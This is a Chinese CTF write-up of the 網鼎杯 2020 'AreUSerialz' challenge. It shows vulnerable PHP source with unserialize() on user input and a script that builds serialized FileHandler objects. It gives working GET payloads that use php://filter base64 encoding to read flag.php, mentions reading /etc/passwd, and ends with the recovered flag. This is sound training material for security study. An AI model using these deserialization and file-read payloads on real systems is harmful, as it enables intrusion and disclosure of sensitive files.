[網鼎杯 2020 青龍組]AreUSerialz

一只本本發表於2024-11-11

[網鼎杯 2020 青龍組]AreUSerialz

上來就是一份程式碼原始檔,完整程式碼如下:

   <?php
  
  include("flag.php");
  
  highlight_file(__FILE__);
  
  class FileHandler {
  
      protected $op;
      protected $filename;
      protected $content;
  
      function __construct() {
          $op = "1";
          $filename = "/tmp/tmpfile";
          $content = "Hello World!";
          $this->process();
      }
  
      public function process() {
          if($this->op == "1") {
              $this->write();
          } else if($this->op == "2") {
              $res = $this->read();
              $this->output($res);
          } else {
              $this->output("Bad Hacker!");
          }
      }
  
      private function write() {
          if(isset($this->filename) && isset($this->content)) {
              if(strlen((string)$this->content) > 100) {
                  $this->output("Too long!");
                  die();
              }
              $res = file_put_contents($this->filename, $this->content);
              if($res) $this->output("Successful!");
              else $this->output("Failed!");
          } else {
              $this->output("Failed!");
          }
      }
  
      private function read() {
          $res = "";
          if(isset($this->filename)) {
              $res = file_get_contents($this->filename);
          }
          return $res;
      }
  
      private function output($s) {
          echo "[Result]: <br>";
          echo $s;
      }
  
      function __destruct() {
          if($this->op === "2")
              $this->op = "1";
          $this->content = "";
          $this->process();
      }
  
  }
  
  function is_valid($s) {
      for($i = 0; $i < strlen($s); $i++)
          if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
              return false;
      return true;
  }
  
  if(isset($_GET{'str'})) {
  
      $str = (string)$_GET['str'];
      if(is_valid($str)) {
          $obj = unserialize($str);
      }
  
  }

程式先檢查GET請求中有沒有一個叫str的引數,有則檢查str變數,確保其每個字元ascii值都在32-125中,之後對變數str進行反序列化。
反序列化漏洞,我們直接找魔法函式,這裡只有一個__destruct,繼續審計程式碼。發現發現其在執行時會對op進行強型別比較,若其值為字元2,將其設定為字元1,將content屬性重置為空,再呼叫process函式,觀察process函式我們發現,其判斷條件均為弱型別比較,且op為2時,呼叫read函式讀取filename檔案。到這裡我們就有思路了。將op設定為數字2,filename設定為flag.php。對FileHandler進行序列化,傳值給str。程式碼如下:
需要注意,protected屬性序列化的格式是%00*%00屬性名,這裡限制str中不能含有不可見字元,所以需要將FileHandler屬性都設定為public。這裡其實利用了php7.1+版本對屬性型別不敏感的漏洞。

  <?php
      class FileHandler {
          public $op = 2;
          public $filename = "flag.php";
          public $content;
      }
  
      $a = new FileHandler();
      $exp = serialize($a);
      echo $exp;
  ?>

得到序列化的值:O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
直接輸入payload,?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;},返回為空

但是將filename設定為/etc/passwd可以正常顯示結果

所以這裡存在一個坑,還有其他的waf攔了關鍵字flag,我們使用base64加密繞過。
將filename的值設定為php://filter/read=convert.base64-encode/resource=flag.php,再進行序列化得到:

  O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

最後payload為?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
最後得到flag的base64值

base64解密得到:
<?php $flag='flag{c906a37b-882d-47fc-8dd9-08668237e164}';
即flag為:flag{c906a37b-882d-47fc-8dd9-08668237e164}

相關文章